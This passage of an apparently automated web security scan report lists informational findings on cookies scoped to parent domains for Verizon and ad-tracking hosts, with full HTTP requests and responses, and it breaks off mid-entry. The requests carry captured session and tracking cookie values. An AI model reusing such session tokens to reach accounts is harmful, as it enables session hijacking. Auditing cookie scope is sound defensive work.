Path:   /enterprisesolutions/staticcontent/images/icn_errorMssg.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/icn_errorMssg.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/submitEnrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 546
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "222-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7146
Date: Mon, 05 Sep 2011 22:25:17 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:17 GMT

GIF89a.....G............O.....................................
...d.4...+.............$............(.FR..|....zx....#....................................s..^..c..........................t.............
...[SNIP]...

14.42. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/icn_video.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/icn_video.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/icn_video.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/irepair/QuickTicketIdentify.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; CP=null*

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 410
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "19a-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:40:49 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:40:49 GMT

GIF89a.............................................................................................................................................................vvvuuurrrllleeeddd...................
...[SNIP]...

14.43. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/s.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/s.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/s.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 43
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:56 GMT
ETag: "2b-4e228b00"
Accept-Ranges: bytes
Cache-Control: private, max-age=7184
Date: Mon, 05 Sep 2011 22:22:43 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:43 GMT

GIF89a.............!.......,...........D..;

14.44. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/tooltip_button.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/tooltip_button.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/tooltip_button.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/signIn.do?TYPE=33554433&REALMOID=06-3bc2b407-708d-100e-b8d8-80e9104e0217&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=yEpKvw2seAPol78XasYtX0XQ0z1SO8yMK6CDIkxTGYk63aSlmsHTzcEjfuEFE05q&TARGET=$SM$HTTPS%3a%2f%2fenterprisecenter%2everizon%2ecom%2fenterprisesolutions%2fglobal%2fgHome%2edo
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; CP=null*

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 133
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:56 GMT
ETag: "85-4e228b00"
Accept-Ranges: bytes
Cache-Control: private, max-age=7141
Date: Mon, 05 Sep 2011 22:25:25 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:25 GMT

GIF89a....    .............DDD...UUU...........................!.....    .,.........20.@k.)..;......a..\a....hP.....1t)..%.....I..X....;

14.45. https://enterprisecenter.verizon.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html
Location: /enterprisesolutions/Default/favicon.ico
Vary: accept-encoding
Expires: Mon, 05 Sep 2011 22:25:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:25:22 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:22 GMT
Content-Length: 0


14.46. http://forums.verizon.com/t5/FiOS-Internet/Need-webmail-contacts-CSV-titles/td-p/23248

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.verizon.com
Path:   /t5/FiOS-Internet/Need-webmail-contacts-CSV-titles/td-p/23248

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/FiOS-Internet/Need-webmail-contacts-CSV-titles/td-p/23248 HTTP/1.1
Host: forums.verizon.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=verizon+online+news+webmail#q=site:verizon.com+online+news+webmail&hl=en&prmd=ivns&ei=RVBlTuSuBePmiAKx7NyXCg&start=10&sa=N&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:42:55 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b
Set-Cookie: VISITORID=1597650297; Domain=.verizon.com; Expires=Fri, 05-Sep-2014 16:09:13 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Content-Length: 194018
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...

14.47. http://g-pixel.invitemedia.com/gmatcher

Summary

Severity:   Information
Confidence:   Certain
Host:   http://g-pixel.invitemedia.com
Path:   /gmatcher

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gmatcher?id=CAESEDlps0WDQzL_sGCOCdezGYM&cver=1 HTTP/1.1
Host: g-pixel.invitemedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d1qpxk1wfeh8v1.cloudfront.net/tags/1234568496.html
Cookie: segments_p1="eJzjYuFY1sjMxcIx9w+IXHiHEUjufg0ij31n4mLmWJsHZHZ2MHNxcjwIF7gz5/BnFqDADrCK3uNMQPLMexB7H1jkywdGoJ7nuUDmzo8g5j8OIPM0WMXG9SwAmsIfSg=="; exchange_uid=eyIyIjogWyI3ODYxMjY3NDUwNTIyMTIwMTc4IiwgNzM0MzUyXSwgIjQiOiBbIkNBRVNFRGxwczBXRFF6TF9zR0NPQ2RlekdZTSIsIDczNDM1M119; uid=776b70d9-5df4-4d1b-98af-982dd1709cac; subID="{}"; impressions="{\"726143\": [1312827315+ \"01026648-7049-425e-a7ce-9a7cb258a341\"+ 70243+ 29835+ 1365]+ \"778530\": [1312501863+ \"7260679259817030178\"+ 162013+ 105345+ 12332]}"; camp_freq_p1="eJzjkuH4dZZZgFFi8/mGTywKjBrvQbQBowWYzyXCca2PHSj7/MGbjywKDBoMBgwWDAD8gxIK"; io_freq_p1="eJzjEuZY5SzAKLH5fMMnFgNGCzDNJczRmgEUfP7gzUcWBQYNBgMGCwYAJnoNKA=="; dp_rec="{\"2\": 1312827317+ \"4\": 1312827314}"; partnerUID="eyIxMTUiOiBbIjRlMzcxMDQ0MzJmZTExNDgiLCB0cnVlXSwgIjE5OSI6IFsiQkI0MEFFQTI5RUFFQjNGMDBCOTI1ODkzOUZDMEQ3RjMiLCB0cnVlXSwgIjE2OSI6IFsiNGUzNzEwNDQzMmZlMTE0OCIsIHRydWVdLCAiODQiOiBbIkVhemJWWUdKOTk5cjZZa20iLCB0cnVlXX0="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 05 Sep 2011 22:14:41 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 05-Sep-2011 22:14:21 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: exchange_uid=eyIyIjogWyI3ODYxMjY3NDUwNTIyMTIwMTc4IiwgNzM0MzUyXSwgIjQiOiBbIkNBRVNFRGxwczBXRFF6TF9zR0NPQ2RlekdZTSIsIDczNDM4NV19; Domain=invitemedia.com; expires=Tue, 04-Sep-2012 22:14:41 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

14.48. http://get.adobe.com/flashplayer/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://get.adobe.com
Path:   /flashplayer/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /flashplayer/ HTTP/1.1
Host: get.adobe.com
Proxy-Connection: keep-alive
Referer: http://phones.verizonwireless.com/htc/thunderbolt/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: storeregion=; s_vi=[CS]v1|272F173A85013C4B-60000106C0356B2B[CE]; UID=408BD657%2DBBDF%2DB561%2D47843A1059325B5B; op537volumelicensinggum=a00c02502m278vr07v3a22278vr08138v87c9; AWID=172.26.150.8.1314799484806; company_history=%5B%5B%22http%3A//support.muse.adobe.com/muse%22%2C%22Muse%22%5D%5D; is_human=true; mbox=PC#1314797047557-324714.19#1316024271|session#1314813238023-632011#1314816531|disable#browser%20timeout#1314817080|check#true#1314814731

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:20:20 GMT
Server: JRun Web Server
Content-Type: text/html; charset=UTF-8
Cache-Control: private, no-store, no-cache
Content-Language: en-US
Content-Language: en-US
Set-Cookie: SETTINGS.LOCALE=en%5Fus;domain=.adobe.com;expires=Wed, 28-Aug-2041 22:20:21 GMT;path=/cfusion/
Content-Length: 27953

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="EN_US">
<he
...[SNIP]...

14.49. http://idcs.interclick.com/Segment.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /Segment.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=5d69f842-0719-4c5b-961b-9400c8d4e652 HTTP/1.1
Host: idcs.interclick.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2761768;type=consu459;cat=veriz742;ord=3888297551964.5366?
Cookie: T=1; uid=u=b302c5d5-65f2-40f8-a929-cb62b8ddcae9; sgm=7435=734382&7980=734355&7596=734356&8629=734382&6376=734377&508=734383; tpd=e20=1315359826890&e90=1313372627004&e50=1315359827084&e100=1313372627366

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=7435=734382&7980=734355&7596=734356&8629=734382&6376=734377&508=734383&11095=734384; domain=.interclick.com; expires=Sun, 05-Sep-2021 22:14:39 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 05 Sep 2011 22:14:38 GMT

GIF89a.............!.......,...........D..;

14.50. http://leadback.advertising.com/adcedge/lb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=verizonlb_cs=1&betq=12605=431339 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2761768;type=consu459;cat=veriz742;ord=7656746518332.511?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 05 Sep 2011 22:16:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Wed, 04-Sep-2013 22:16:10 GMT; path=/
Set-Cookie: F1=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: BASE=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ROLL=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: aceRTB=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: GUID=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: C2=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Mon, 05 Sep 2011 23:16:10 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

14.51. http://leadback.advertising.com/adcedge/lb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
